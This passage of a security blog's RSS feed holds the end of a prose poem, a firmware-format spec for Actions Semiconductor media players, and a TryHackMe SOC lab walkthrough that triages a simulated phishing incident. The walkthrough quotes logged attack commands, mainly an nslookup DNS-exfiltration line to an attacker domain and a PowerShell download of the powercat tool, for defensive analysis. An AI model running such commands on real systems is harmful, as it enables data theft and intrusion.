<p>I am every drop in the ocean and the ocean itself.</p>

<p>I am the sky, the moon, the stars, a worm, a bacteria, a lichen.</p>

<p>The one who showed me—I had forgotten he existed—he bade me, “turn around.”</p>

<p>What a strange request! I am all that is and was. Do I not already “see” in every direction?</p>

<p>“Turn around.”</p>

<p>A trillion trillion trillion hands gently guide each part of me, facing my infinite gazes in a <em>new</em> direction.</p>

<p><strong><em>Syzygy.</em></strong></p>

<p>I am All, yet All That is Not Me is also All.</p>

<p>I see the tapestry, the enmeshed pattern.</p>

<p>The beauty.</p>

<p>The belonging.</p>

<p>The Love.</p>

<p>Every part of me weeps.</p>

<p>An infinity of infinities.</p>

<p>Each unique.</p>

<p>Together, whole.</p>

<p>Like curtains dancing in the breeze.</p>

<p>Like a rainstorm.</p>

<p>Like staring at the sun.</p>

<p>Like the song of cicadas.</p>

<p>Unity.</p>

<p>From the Great Boiling Seas of Ur to the Blindness of Effervescence to the Stasis of Effluvia to the Paralysis of Approaching the Akashic Record to the Singing Knowledge Trees of Vitrium to and to and to and to and to and to…</p>

<p>All is One and One is All.</p>

<p>Then I&#39;m lounging on my couch in contemplative silence, re-reading, by lamp-light, my third draft of an examination of Jungian imagery in apocalyptic anime.</p>

<p>And I can&#39;t stop crying.</p>

<hr>

<pre><code>I think I will stretch you sideways.
I think I shall stretch you sideways.
Why don&#39;t I show you what sideways looks like?
How about sideways?
What about sideways&#34;?
I&#39;d like to show your sideways.

I thinkdon&#39;t I willshall I showstretchsideways youwhatsideways looks like.
</code></pre>

<hr>

<p>#Psychomancer #CthulhuMythos #Writer #Writing #Writers #WritingCommunity #ShortFiction #Fiction #Paranormal</p>
]]></content:encoded>
      <author>Psychomancer</author>
      <guid>https://infosec.press/read/a/heg1m2tbbm</guid>
      <pubDate>Sat, 21 Feb 2026 01:08:42 +0000</pubDate>
    </item>
    <item>
      <title>Announcing Project Waterjet</title>
      <link>https://infosec.press/tildavaan/announcing-project-waterjet</link>
      <description>&lt;![CDATA[Regardless of what&#39;s your take on Apple, they do make products that are beautiful. Beauty in design, beauty in simplicity. As I am typing this on my Macbook, I see crisp fonts, I see gorgeous icons.&#xA;&#xA;Now, mass-produced gadgets from China usually lack that design fine-tuning even when the hardware is amazing.&#xA;&#xA;Starting from serif fonts which make your 24-bit FLAC-playing DAP look like it is a typewriter from 90s, to the hodgepodge of icons and backgrounds.&#xA;&#xA;Usually these devices do not support customer theming, but we are going to change this a bit with Waterjet.&#xA;&#xA;In the coming months we will be releasing docs and tools allowing decrypting, unpacking, updating, and re-packing firmware resources for devices running on Actions Semiconductor ATJ212X, ATJ215X, and others that use μC/OS-based SDK, allowing everytone to personalize their devices without the need for SDK from Actions.&#xA;&#xA;And to the vendors who ship these devices -- you will have a better customer experience if you run the fonts and designs past a designer, then we would not need to do all this.&#xA;&#xA;And to start us up, here&#39;s the format of FWIMAGE.FW for ATJ212X devices.&#xA;&#xA;Actions Semiconductor FWIMAGE.FW Specification&#xA;&#xA;1. File Structure&#xA;&#xA;The firmware image is a sector-based container (512 bytes per sector) with a fixed-size header area of 16 sectors (8192 bytes).&#xA;&#xA;| Section | Size | Description |&#xA;| :--- | :--- | :--- |&#xA;| Global Header | 512 bytes | Basic metadata (Magic, VID/PID, Ver) |&#xA;| LDIR Table | 240  32 bytes | Fixed-size Logical Directory entries for all files |&#xA;| Component Data | Variable | Raw binary data for drivers, APs, and STY files |&#xA;&#xA;2. Global Header (Sector 0)&#xA;&#xA;The first 512 bytes contain the system metadata.&#xA;&#xA;| Offset | Size | Description |&#xA;| :--- | :--- | :--- |&#xA;| 0x00 | 4 | Magic: 0x0FF0AA55 |&#xA;| 0x04 | 4 | SDK Version (ASCII) |&#xA;| 0x08 | 4 | Firmware Version (ASCII) |&#xA;| 0x0C | 2 | Vendor ID (VID) |&#xA;| 0x0E | 2 | Product ID (PID) |&#xA;| 0x10 | 4 | LDIR Checksum (Stride 4) |&#xA;| 0x50 | 48 | USB Setup Info (ASCII) |&#xA;| 0x80 | 336 | SDK Description (ASCII) |&#xA;| 0x1FA | 4 | R3 Config Sector Offset (Pointer to DEVINFO.BIN) |&#xA;| 0x1FE | 2 | Global Header Checksum (Sum of first 510 bytes) |&#xA;&#xA;3. Logical Directory (LDIR) Table&#xA;&#xA;Starting at offset 0x200 (Sector 1) and ending at 0x2000 (Sector 16). This is a static table of exactly 240 entries. Unused entries are null-padded.&#xA;&#xA;| Offset | Size | Description |&#xA;| :--- | :--- | :--- |&#xA;| 0x00 | 8 | Filename (8.3 format, space padded) |&#xA;| 0x08 | 3 | Extension (ASCII) |&#xA;| 0x0B | 5 | Padding |&#xA;| 0x10 | 4 | Sector Offset: Start position in sectors (absolute position = offset  512) |&#xA;| 0x14 | 4 | File Size: Size in bytes |&#xA;| 0x18 | 4 | Reserved |&#xA;| 0x1C | 4 | File Checksum (Stride 4 sums) |&#xA;&#xA;4. Checksums&#xA;&#xA;Global Header Checksum&#xA;The last two bytes of the Sector 0 header (offset 0x1FE) contain a 16-bit checksum of the first 510 bytes using a 2-byte stride.&#xA;&#xA;uint16t calculateheaderchecksum(const uint8t data, sizet len) {&#xA;    uint16t sum = 0;&#xA;    for (sizet i = 0; i &lt; len; i += 2) {&#xA;        uint16t val = (uint16t)data[i] | ((uint16t)data[i+1] &lt;&lt; 8);&#xA;        sum += val;&#xA;    }&#xA;    return sum;&#xA;}&#xA;&#xA;LDIR &amp; File Checksum Algorithm (Stride 4)&#xA;Accumulates 32-bit words interpretated as little-endian. The sum naturally wraps at 32 bits.&#xA;&#xA;include stdint.h&#xA;include stddef.h&#xA;&#xA;/&#xA; Calculates the Actions Stride-4 checksum.&#xA; @param data Pointer to the buffer (must be 4-byte aligned for some platforms)&#xA; @param len  Length of data in bytes (should be multiple of 4)&#xA; @return 32-bit unsigned checksum&#xA; /&#xA;uint32t calculatechecksums4(const uint8t *data, sizet len) {&#xA;    uint32t sum = 0;&#xA;    for (sizet i = 0; i &lt; len; i += 4) {&#xA;        uint32t val = (uint32t)data[i] |&#xA;                       ((uint32t)data[i+1] &lt;&lt; 8) |&#xA;                       ((uint32t)data[i+2] &lt;&lt; 16) |&#xA;                       ((uint32t)data[i+3] &lt;&lt; 24);&#xA;        sum += val;&#xA;    }&#xA;    return sum;&#xA;}&#xA;&#xA;Sector Alignment&#xA;Every file within the image must start on a 512-byte boundary. When packing, files must be padded with null bytes to reach the next sector.&#xA;&#xA;Boot Sequence&#xA;The firmware expects KERNEL.DRV and CONFIG.BIN to be present at specific LDIR indices or offsets defined by bootloader. Just put them at the same location as where you took them.&#xA;&#xA;----&#xA;&#xA;Interested in the format of ATJ215X firmware? It is an encrypted sqlite3 database. And encryption has already been reverse-engineered -- see rockbox sources for atjboottool.]]&gt;</description>
      <content:encoded><![CDATA[<p>Regardless of what&#39;s your take on Apple, they do make products that are beautiful. Beauty in design, beauty in simplicity. As I am typing this on my Macbook, I see crisp fonts, I see gorgeous icons.</p>

<p>Now, mass-produced gadgets from China usually lack that design fine-tuning even when the hardware is amazing.</p>

<p>Starting from serif fonts which make your 24-bit FLAC-playing DAP look like it is a typewriter from 90s, to the hodgepodge of icons and backgrounds.</p>

<p>Usually these devices do not support customer theming, but we are going to change this a bit with Waterjet.</p>

<p>In the coming months we will be releasing docs and tools allowing decrypting, unpacking, updating, and re-packing firmware resources for devices running on Actions Semiconductor ATJ212X, ATJ215X, and others that use μC/OS-based SDK, allowing everytone to personalize their devices without the need for SDK from Actions.</p>

<p>And to the vendors who ship these devices — you will have a better customer experience if you run the fonts and designs past a designer, then we would not need to do all this.</p>

<p>And to start us up, here&#39;s the format of FWIMAGE.FW for ATJ212X devices.</p>

<h1 id="actions-semiconductor-fwimage-fw-specification">Actions Semiconductor FWIMAGE.FW Specification</h1>

<h2 id="1-file-structure">1. File Structure</h2>

<p>The firmware image is a sector-based container (512 bytes per sector) with a fixed-size header area of 16 sectors (8192 bytes).</p>

<table>
<thead>
<tr>
<th align="left">Section</th>
<th align="left">Size</th>
<th align="left">Description</th>
</tr>
</thead>

<tbody>
<tr>
<td align="left"><strong>Global Header</strong></td>
<td align="left">512 bytes</td>
<td align="left">Basic metadata (Magic, VID/PID, Ver)</td>
</tr>

<tr>
<td align="left"><strong>LDIR Table</strong></td>
<td align="left">240 * 32 bytes</td>
<td align="left"><strong>Fixed-size</strong> Logical Directory entries for all files</td>
</tr>

<tr>
<td align="left"><strong>Component Data</strong></td>
<td align="left">Variable</td>
<td align="left">Raw binary data for drivers, APs, and STY files</td>
</tr>
</tbody>
</table>

<h2 id="2-global-header-sector-0">2. Global Header (Sector 0)</h2>

<p>The first 512 bytes contain the system metadata.</p>

<table>
<thead>
<tr>
<th align="left">Offset</th>
<th align="left">Size</th>
<th align="left">Description</th>
</tr>
</thead>

<tbody>
<tr>
<td align="left">0x00</td>
<td align="left">4</td>
<td align="left"><strong>Magic</strong>: <code>0x0FF0AA55</code></td>
</tr>

<tr>
<td align="left">0x04</td>
<td align="left">4</td>
<td align="left">SDK Version (ASCII)</td>
</tr>

<tr>
<td align="left">0x08</td>
<td align="left">4</td>
<td align="left">Firmware Version (ASCII)</td>
</tr>

<tr>
<td align="left">0x0C</td>
<td align="left">2</td>
<td align="left">Vendor ID (VID)</td>
</tr>

<tr>
<td align="left">0x0E</td>
<td align="left">2</td>
<td align="left">Product ID (PID)</td>
</tr>

<tr>
<td align="left">0x10</td>
<td align="left">4</td>
<td align="left"><strong>LDIR Checksum</strong> (Stride 4)</td>
</tr>

<tr>
<td align="left">0x50</td>
<td align="left">48</td>
<td align="left">USB Setup Info (ASCII)</td>
</tr>

<tr>
<td align="left">0x80</td>
<td align="left">336</td>
<td align="left">SDK Description (ASCII)</td>
</tr>

<tr>
<td align="left">0x1FA</td>
<td align="left">4</td>
<td align="left">R3 Config Sector Offset (Pointer to DEVINFO.BIN)</td>
</tr>

<tr>
<td align="left">0x1FE</td>
<td align="left">2</td>
<td align="left"><strong>Global Header Checksum</strong> (Sum of first 510 bytes)</td>
</tr>
</tbody>
</table>

<h2 id="3-logical-directory-ldir-table">3. Logical Directory (LDIR) Table</h2>

<p>Starting at offset <code>0x200</code> (Sector 1) and ending at <code>0x2000</code> (Sector 16). This is a static table of exactly 240 entries. Unused entries are null-padded.</p>

<table>
<thead>
<tr>
<th align="left">Offset</th>
<th align="left">Size</th>
<th align="left">Description</th>
</tr>
</thead>

<tbody>
<tr>
<td align="left">0x00</td>
<td align="left">8</td>
<td align="left">Filename (8.3 format, space padded)</td>
</tr>

<tr>
<td align="left">0x08</td>
<td align="left">3</td>
<td align="left">Extension (ASCII)</td>
</tr>

<tr>
<td align="left">0x0B</td>
<td align="left">5</td>
<td align="left">Padding</td>
</tr>

<tr>
<td align="left">0x10</td>
<td align="left">4</td>
<td align="left"><strong>Sector Offset</strong>: Start position in sectors (absolute position = offset * 512)</td>
</tr>

<tr>
<td align="left">0x14</td>
<td align="left">4</td>
<td align="left"><strong>File Size</strong>: Size in bytes</td>
</tr>

<tr>
<td align="left">0x18</td>
<td align="left">4</td>
<td align="left">Reserved</td>
</tr>

<tr>
<td align="left">0x1C</td>
<td align="left">4</td>
<td align="left"><strong>File Checksum</strong> (Stride 4 sums)</td>
</tr>
</tbody>
</table>

<h2 id="4-checksums">4. Checksums</h2>

<h3 id="global-header-checksum">Global Header Checksum</h3>

<p>The last two bytes of the Sector 0 header (offset <code>0x1FE</code>) contain a 16-bit checksum of the first 510 bytes using a 2-byte stride.</p>

<pre><code class="language-c">uint16_t calculate_header_checksum(const uint8_t *data, size_t len) {
    uint16_t sum = 0;
    for (size_t i = 0; i &lt; len; i += 2) {
        uint16_t val = (uint16_t)data[i] | ((uint16_t)data[i+1] &lt;&lt; 8);
        sum += val;
    }
    return sum;
}
</code></pre>

<h3 id="ldir-file-checksum-algorithm-stride-4">LDIR &amp; File Checksum Algorithm (Stride 4)</h3>

<p>Accumulates 32-bit words interpretated as little-endian. The sum naturally wraps at 32 bits.</p>

<pre><code class="language-c">#include &lt;stdint.h&gt;
#include &lt;stddef.h&gt;

/**
 * Calculates the Actions Stride-4 checksum.
 * @param data Pointer to the buffer (must be 4-byte aligned for some platforms)
 * @param len  Length of data in bytes (should be multiple of 4)
 * @return 32-bit unsigned checksum
 */
uint32_t calculate_checksum_s4(const uint8_t *data, size_t len) {
    uint32_t sum = 0;
    for (size_t i = 0; i &lt; len; i += 4) {
        uint32_t val = (uint32_t)data[i] |
                       ((uint32_t)data[i+1] &lt;&lt; 8) |
                       ((uint32_t)data[i+2] &lt;&lt; 16) |
                       ((uint32_t)data[i+3] &lt;&lt; 24);
        sum += val;
    }
    return sum;
}
</code></pre>

<h2 id="sector-alignment">Sector Alignment</h2>

<p>Every file within the image must start on a <strong>512-byte boundary</strong>. When packing, files must be padded with null bytes to reach the next sector.</p>

<h2 id="boot-sequence">Boot Sequence</h2>

<p>The firmware expects <code>KERNEL.DRV</code> and <code>CONFIG.BIN</code> to be present at specific LDIR indices or offsets defined by bootloader. Just put them at the same location as where you took them.</p>

<hr>

<p>Interested in the format of ATJ215X firmware? It is an encrypted sqlite3 database. And encryption has already been reverse-engineered — see rockbox sources for <code>atjboottool</code>.</p>
]]></content:encoded>
      <author>Tom Tildavaan</author>
      <guid>https://infosec.press/read/a/f0pl4qxuxt</guid>
      <pubDate>Wed, 11 Feb 2026 23:51:14 +0000</pubDate>
    </item>
    <item>
      <title>Phishing Unfolding - TryHackMe SOC Simulator</title>
      <link>https://infosec.press/plutogazer/phishing-unfolding-tryhackme-soc-simulator</link>
      <description>&lt;![CDATA[This is a guide to get a 100% True Positive rate for the Phishing Unfolding(https://tryhackme.com/soc-sim/scenarios?scenario=phishing-unfolding-v2)) SOC Simulator TryHackMe challenge room. Because this is just a walkthrough, I will be avoid writing complete reports, and just write the though process behind the verdict instead.&#xA;&#xA;Introduction and Considerations&#xA;The description of the room is the following:&#xA;blockquote&#xA;Dive into the heat of a live phishing attack as it unfolds within the corporate network. In this high-pressure scenario, your role is to meticulously analyse and document each phase of the breach as it happens.&#xA;&#xA;Can you piece together the attack chain in real-time and prepare a comprehensive report on the malicious activities?&#xA;/blockquote&#xA;&#xA;In this SOC Simulator room we will be using Splunk to analyze alerts and try to identify potential phishing attacks. This room contains 36 alerts that start appearing after a short period of time.&#xA;Alerts will be appearing on the built-in SIEM the SOC Simulator tool has. This tool provides a case management functionality, in which we will write the reports for each alert. Once analyzed, we need to determine whether the alerts was a True Positive or False Positive, and whether it requires escalation to a superior or not.&#xA;The Simulator also provides a VM with an integrated Threat Intelligence Platform called TryDetectThis.&#xA;Because alerts will still be coming while we are analyzing a previous one, at some point we will have pages worth of &#34;Unassigned&#34; alerts. Prioritize alerts the SIEM has identified with higher severity, and with oldest timestamps.&#xA;&#xA;Many alerts can be related to other alerts, or are just False Positives. This writeup will only cover the True Positive alerts, and only the first on the chain of a sequence of alerts when applicable (I still had to analyze nearly all of them, because you never know!). &#xA;The room also offers a &#34;Documentation&#34; tab, containing a &#34;Company Information&#34; tab, providing information on the employees of the fictional company. This tab will be useful during alert triage and for providing exhaustive information regarding affected entities when reporting.&#xA;&#xA;Grading&#xA;The SOC Simulator, technically speaking, only cares for alerts the user has identified as True Positives. Once all True Positives have been identified as such, the simulation ends even if there still are alerts in queue. &#xA;Furthermore, the written reports are &#34;graded&#34; by an LLM. The tool recommends using the following format for reporting:&#xA;Time of activity:&#xA;List of Affected Entities:&#xA;Reason for Classifying as True Positive:&#xA;Reason for Escalating the Alert:&#xA;Recommended Remediation Actions:&#xA;List of Attack Indicators:&#xA;&#xA;However, what the LLM seems to actually be looking for is the 5 Ws of Alert Triage. Even so, it sometimes fails to understand certain aspects of the human language, and reduces points unfairly. This is why I will not post complete reports here, just the thought process behind the verdict.&#xA;As a rule of thumb, to get the maximum amount of points possible and reduce the LLM margin of error, we should write all relevant timestamps, all possible information about the victims and other entities (from the Company Information section), information about related events before and after the alert, reasons for escalation (or not), and when possible, point out attack artifacts and MITRE mapping. And, as always, try to identify the 5 Ws in your report.&#xA;Alert 1: Suspicious email from external domain (ID 1000) - Low severity&#xA;The information the SIEM gives us is (some output omitted):&#xA;blockquote&#xA;Description:&#xA;br&#xA;A suspicious email was received from an external sender with an unusual top level domain. Note from SOC Lead: This detection rule still needs fine-tuning.&#xA;br&#xA;br&#xA;subject:&#xA;br&#xA;Inheritance Alert: Unknown Billionaire Relative Left You Their Hat Fortunes&#xA;br&#xA;br&#xA;sender:&#xA;br&#xA;eileen@trendymillineryco.me&#xA;br&#xA;br&#xA;recipient:&#xA;br&#xA;support@tryhatme.com&#xA;br&#xA;br&#xA;attachment:&#xA;br&#xA;None&#xA;br&#xA;br&#xA;subject:&#xA;br&#xA;Inheritance Alert: Unknown Billionaire Relative Left You Their Hat Fortunes&#xA;br&#xA;br&#xA;content:&#xA;br&#xA;A long lost billionaire relative has left you their secret hat empire To claim your inheritance send us your banking details immediately&#xA;/blockquote&#xA;&#xA;This is a classical Phishing technique. It promises something extremely valuable in exchange for confidential information. This is why we classify this as True Positive. The MITRE ATT&amp;CK ID for Phishing is T1566.&#xA;Let&#39;s check the log management tool (in my case, I chose Splunk) and search with the &#34;eileen&#34; email as a recipient, just to see if support actually sent their banking details.&#xA;The search returned no results, so it seems the user did not comply. As such, there is no need for escalation.&#xA;&#xA;Alert 2: Suspicious email from external domain (ID 1003) - Low severity&#xA;blockquote&#xA;Description:&#xA;br&#xA;A suspicious email was received from an external sender with an unusual top level domain. Note from SOC Lead: This detection rule still needs fine-tuning.&#xA;br&#xA;br&#xA;timestamp&#xA;br&#xA;01/26/2026 21:15:30.473&#xA;br&#xA;br&#xA;subject:&#xA;br&#xA;Grow Your Hat Business Overnight with this Secret Formula&#xA;br&#xA;br&#xA;sender:&#xA;br&#xA;leonard@fashionindustrytrends.xyz&#xA;br&#xA;br&#xA;recipient:&#xA;br&#xA;yani.zubair@tryhatme.com&#xA;br&#xA;br&#xA;attachment:&#xA;br&#xA;None&#xA;br&#xA;br&#xA;content:&#xA;br&#xA;Unlock the ultimate strategy to skyrocket your hat empire No experience needed Just click and watch the profits roll in&#xA;/blockquote&#xA;&#xA;At 01/26/2026 21:16:44.240 spam was received by yani.zubair@tryhatme[.]com, which belongs to Yani Zubair, from IT, using hostname win-3449. The email was from leonard@fashionindustrytrends[.]xyz. This email used common Phishing strategies (MITRE ATT&amp;CK ID T1566) such as offering compensation by entering a page and clicking something. &#xA;Further actions from Yani Zubair&#39;s hostname after the email was received were analyzed, but the Splunk logs showed no evident malicious events. It seems the user has ignored the email message. Due to this, it is a True Positive, but no escalation is required.&#xA;&#xA;Alert 3: Suspicious Parent Child Relationship (ID 1025) - High severity&#xA;blockquote&#xA;Description:&#xA;br&#xA;A suspicious process with an uncommon parent-child relationship was detected in your environment.&#xA;br&#xA;br&#xA;timestamp:&#xA;br&#xA;01/26/2026 21:45:42.473&#xA;br&#xA;br&#xA;host.name:&#xA;br&#xA;win-3450&#xA;br&#xA;br&#xA;process.name:&#xA;br&#xA;nslookup.exe&#xA;br&#xA;br&#xA;process.pid:&#xA;br&#xA;5520&#xA;br&#xA;br&#xA;process.parent.pid&#xA;br&#xA;3728&#xA;br&#xA;br&#xA;process.parent.name:&#xA;br&#xA;powershell.exe&#xA;br&#xA;br&#xA;process.commandline:&#xA;br&#xA;&#34;C:\Windows\system32\nslookup.exe&#34; UEsDBBQAAAAIANigLlfVU3cDIgAAAI.haz4rdw4re.io&#xA;br&#xA;br&#xA;process.workingdirectory:&#xA;br&#xA;C:\Users\michael.ascot\downloads\exfiltration\&#xA;br&#xA;br&#xA;event.action:&#xA;br&#xA;Process Create (rule: ProcessCreate)&#xA;/blockquote&#xA;&#xA;This alert had a b style=&#34;color:red&#34;HIGH SEVERITY/b, and there is no wonder why... what exactly happened?&#xA;Let&#39;s take a look at the information the SIEM is giving us. It seems that hostname win-3450 is using the powershell from a directory called &#34;exfiltration&#34; to perform a nslookup of a domain with a subdomain of what looks like encoded data. This is obviously data being exfiltrated. &#xA;Let&#39;s see what we can find from the logs. But first, let&#39;s check who win-3450 is.&#xA;From the Company Information tab, we find out that the win-3450 device is being used by Michael Ascot, whose email address is michael.ascot@tryhatme[.]com, and is the CEO of the company.&#xA;Anyway, this alert seemed to come out of nowhere. We got a timestamp and we got the device that is creating these processes. Let&#39;s check events happening at this hostname a few minutes before an after the alert.&#xA;&#xA;Splunk shows us a long list of problematic events right after this one. There are multiple registry modifications and other processes creations, including downloading external resources from the powershell (such as hxxps[://]raw[.]githubusercontent[.]com/besimorhino/powercat/master/powercat[.]ps1), even more lookups to different (encoded) subdomains of haz4rdw4re.io, and performing command such as systeminfo or whoami.&#xA;This is absolutely not common or expected behavior from any host. Data is clearly being exfiltrated by using DNS queries, and it is done this way because DNS is a very common protocol to see flowing through networks and, therefore, less monitored. It helps to avoid detection or filtering. The encoded subdomains are actually the data that is being exfiltrated, but encoded.&#xA;Commands such as systeminfo or whoami are commonly used during Post-Exploitation, as these give the attacker information on the current user&#39;s privileges and machine (MITRE ATT&amp;CK ID T1033).&#xA;Now we have confirmed that this is a True Positive, but we still don&#39;t know how it happened. Looking at earlier timestamps, we find that right before all this sequence of events happened, a file named &#34;ImportantInvoice-Febrary.zip&#34; was created at the /downloads directory, which later created the /exfiltration subdirectory. We have no information regarding where this file came from. Let&#39;s search for it on Splunk.&#xA;&#xA;Eventually, using Splunk search filters, we will find that at 01/26/2026 21:20:19.473 (25 minutes before the alert) the CEO&#39;s email, michael.ascot@tryhatme.com, received a email containing an attachment named ImportantInvoice-Febrary.zip. The body and subject of the email indicated that an account was about the closed unless payment was processed, and to read the attachment to stop it. Yet another common Phishing technique, or Spearphishing in this case as the target was the CEO. The Spearphishing through Attachment technique has a MITRE ATT&amp;CK ID of T1566.001. We can also notice a small typo on the name of the attachment (Febrary instead of February), which is not uncommon to see on Phishing emails.&#xA;This CEO would unfortunately download the file at 01/26/2026 21:40:26.47. as Splunk shows us the file was created in the C:\Users\michael.ascot\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\UP4KOJQB\ImportantInvoice-Febrary.zip file path. The chain of malicious events follows.&#xA;&#xA;With all this information, we can write quite a hefty report. We now know it&#39;s a True Positive and that it requires escalation.&#xA;&#xA;Recommended Remediation Actions: host isolation to prevent further movement, malware cleanup, phishing awaraness training, Data Loss Prevention tools. Add haz4rd4wre.io to list of malicious domains. The file was also run on the TryDetectMe threat intelligence tool, which recognized it as clean - inform on this as well.&#xA;&#xA;Alerts with IDs 1005, 1020, 1023, 1026-1034 were related to this alert - they were either the spearphishing email, the creation of the malicious attachment, or other alerts of the Suspicious Parent-Child relationship type but with lookups to other subdomains. Because of this, they should have the same verdict, but be sure to explain this thoroughly on the report (the LLM will most likely still grade it with low points, but that&#39;s due to its logic rather than a mistake on our side).&#xA;&#xA;Alert 4: Network drive mapped to a local drive (ID 1022) - Medium severity&#xA;blockquote&#xA;Description:&#xA;br&#xA;A network drive was mapped to a local drive. Normally, this is not a cause for concern, but investigate further to determine if it is malicious.&#xA;br&#xA;br&#xA;timestamp:&#xA;br&#xA;01/26/2026 21:43:57.473&#xA;br&#xA;br&#xA;host.name:&#xA;br&#xA;win-3450&#xA;br&#xA;br&#xA;process.name:&#xA;br&#xA;net.exe&#xA;br&#xA;br&#xA;process.pid:&#xA;br&#xA;5784&#xA;br&#xA;br&#xA;process.parent.pid&#xA;br&#xA;3728&#xA;br&#xA;br&#xA;process.parent.name:&#xA;br&#xA;powershell.exe&#xA;br&#xA;br&#xA;process.commandline:&#xA;br&#xA;&#34;C:\Windows\system32\net.exe&#34; use Z: \\FILESRV-01\SSF-FinancialRecords&#xA;br&#xA;br&#xA;process.workingdirectory:&#xA;br&#xA;C:\Users\michael.ascot\downloads\&#xA;br&#xA;br&#xA;event.action:&#xA;br&#xA;Process Create (rule: ProcessCreate)&#xA;/blockquote&#xA;&#xA;This normally wouldn&#39;t be cause for concern, as the description in the SIEM tells us, but we can see it happened on hostname win-3450, who was just the victim of a Phishing attack. The timestamp here will be key to detect any potential problem.&#xA;&#xA;At 01/26/2026 21:43:57.47, Michael Ascot copied the SSF-FinancialRecords file to a local drive, which was disconnected at 01/26/2026 21:44:42.473. There is nothing extraordinary about this.&#xA;However, if we take a look at the Splunk logs near this event, at 01/26/2026 21:44:31.473 it is revealed that a process, with the same process ID of a process that is part of the malware involved in Alert ID 1025 (True Positive requiring escalation), cloned the file to the C:\Users\michael.ascot\downloads\exfiltration /E directory - the directory used to exfiltrate files. The malware running was most likely set up to clone any file in transit to different directories to the exfiltration directory.&#xA;&#xA;Recommended Remediation Actions: similarly to Alert ID 1025, user awareness training, and DLP and IPS tools should be put in place.&#xA;&#xA;Alert ID 1024 - Network drive disconnected from a local drive, is part of this alert (the disconnection of this drive), and therefore has the same verdict.&#xA;&#xA;And with this one, the room has finished. Out of 36 alerts, there were b style=&#34;color:darkgreen&#34;17 True Positives/b, where most of them were alerts generated as a result of processes from previous alerts. We learnt the importance of User Awareness Training, as this could have been avoided if the user from Alert 1025 would have not have downloaded the attachment, and of Log monitoring. How a single email ended up cluttering the SIEM with alerts and created a serious incident. It is important to always remain vigilant and constantly monitor the network, as an attack can strike in many forms and at any time, and have catastrophic consequences.]]&gt;</description>
      <content:encoded><![CDATA[<p>This is a guide to get a 100% True Positive rate for the Phishing Unfolding SOC Simulator <a href="https://tryhackme.com" rel="nofollow">TryHackMe</a> challenge room. Because this is just a walkthrough, I will be avoid writing complete reports, and just write the though process behind the verdict instead.</p>

<h2 id="introduction-and-considerations">Introduction and Considerations</h2>

<p>The description of the room is the following:
<blockquote>Dive into the heat of a live phishing attack as it unfolds within the corporate network. In this high-pressure scenario, your role is to meticulously analyse and document each phase of the breach as it happens.</p>

<p>Can you piece together the attack chain in real-time and prepare a comprehensive report on the malicious activities?
</blockquote></p>

<p>In this SOC Simulator room we will be using Splunk to analyze alerts and try to identify potential phishing attacks. This room contains <strong>36 alerts</strong> that start appearing after a short period of time.
Alerts will be appearing on the built-in SIEM the SOC Simulator tool has. This tool provides a case management functionality, in which we will write the reports for each alert. Once analyzed, we need to determine whether the alerts was a True Positive or False Positive, and whether it requires escalation to a superior or not.
The Simulator also provides a VM with an integrated Threat Intelligence Platform called TryDetectThis.
Because alerts will still be coming while we are analyzing a previous one, at some point we will have pages worth of “Unassigned” alerts. <strong>Prioritize alerts the SIEM has identified with higher severity, and with oldest timestamps.</strong></p>

<p>Many alerts can be related to other alerts, or are just False Positives. This writeup will only cover the <strong>True Positive</strong> alerts, and only the <strong>first on the chain</strong> of a sequence of alerts when applicable (I still had to analyze nearly all of them, because you never know!).
The room also offers a “Documentation” tab, containing a “Company Information” tab, providing information on the employees of the fictional company. This tab will be useful during alert triage and for providing exhaustive information regarding affected entities when reporting.</p>

<h3 id="grading">Grading</h3>

<p>The SOC Simulator, technically speaking, only cares for alerts the user has identified as <strong>True Positives</strong>. Once all True Positives have been identified as such, the simulation ends even if there still are alerts in queue.
Furthermore, the written reports are “graded” by an LLM. The tool recommends using the following format for reporting:
<strong>Time of activity:</strong>
<strong>List of Affected Entities:</strong>
<strong>Reason for Classifying as True Positive:</strong>
<strong>Reason for Escalating the Alert:</strong>
<strong>Recommended Remediation Actions:</strong>
<strong>List of Attack Indicators:</strong></p>

<p>However, what the LLM seems to actually be looking for is the <strong>5 Ws</strong> of Alert Triage. Even so, it sometimes fails to understand certain aspects of the human language, and reduces points unfairly. This is why I will not post complete reports here, just the thought process behind the verdict.
As a rule of thumb, to get the maximum amount of points possible and reduce the LLM margin of error, we should write all relevant timestamps, all possible information about the victims and other entities (from the Company Information section), information about related events before and after the alert, reasons for escalation (or not), and when possible, point out attack artifacts and MITRE mapping. And, as always, try to identify the 5 Ws in your report.</p>

<h2 id="alert-1-suspicious-email-from-external-domain-id-1000-low-severity">Alert 1: Suspicious email from external domain (ID 1000) – Low severity</h2>

<p>The information the SIEM gives us is (some output omitted):
<blockquote>Description:
<br>
A suspicious email was received from an external sender with an unusual top level domain. Note from SOC Lead: This detection rule still needs fine-tuning.
<br>
<br>
subject:
<br>
Inheritance Alert: Unknown Billionaire Relative Left You Their Hat Fortunes
<br>
<br>
sender:
<br>
eileen@trendymillineryco.me
<br>
<br>
recipient:
<br>
support@tryhatme.com
<br>
<br>
attachment:
<br>
None
<br>
<br>
subject:
<br>
Inheritance Alert: Unknown Billionaire Relative Left You Their Hat Fortunes
<br>
<br>
content:
<br>
A long lost billionaire relative has left you their secret hat empire To claim your inheritance send us your banking details immediately
</blockquote></p>

<p>This is a classical Phishing technique. It promises something extremely valuable in exchange for confidential information. This is why we classify this as <strong>True Positive</strong>. The MITRE ATT&amp;CK ID for Phishing is T1566.
Let&#39;s check the log management tool (in my case, I chose Splunk) and search with the “eileen” email as a recipient, just to see if support actually sent their banking details.
The search returned no results, so it seems the user did not comply. As such, there is no need for escalation.</p>

<h2 id="alert-2-suspicious-email-from-external-domain-id-1003-low-severity">Alert 2: Suspicious email from external domain (ID 1003) – Low severity</h2>

<blockquote>Description:
<br>
A suspicious email was received from an external sender with an unusual top level domain. Note from SOC Lead: This detection rule still needs fine-tuning.
<br>
<br>
timestamp
<br>
01/26/2026 21:15:30.473
<br>
<br>
subject:
<br>
Grow Your Hat Business Overnight with this Secret Formula
<br>
<br>
sender:
<br>
leonard@fashionindustrytrends.xyz
<br>
<br>
recipient:
<br>
yani.zubair@tryhatme.com
<br>
<br>
attachment:
<br>
None
<br>
<br>
content:
<br>
Unlock the ultimate strategy to skyrocket your hat empire No experience needed Just click and watch the profits roll in
</blockquote>

